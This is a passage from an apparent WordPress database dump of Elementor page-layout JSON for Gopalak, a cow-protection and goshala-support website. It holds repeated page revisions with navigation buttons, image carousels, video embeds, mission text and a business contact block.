\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10131,1697,'_elementor_page_assets','a:0:{}'),(10133,1698,'_elementor_edit_mode','builder'),(10134,1698,'_elementor_template_type','wp-page'),(10135,1698,'_elementor_version','3.7.8'),(10136,1698,'_wp_page_template','elementor_canvas'),(10137,1698,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\"},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\"},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10138,1698,'_elementor_page_assets','a:0:{}'),(10140,1699,'_elementor_edit_mode','builder'),(10141,1699,'_elementor_template_type','wp-page'),(10142,1699,'_elementor_version','3.7.8'),(10143,1699,'_wp_page_template','elementor_canvas'),(10144,1699,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\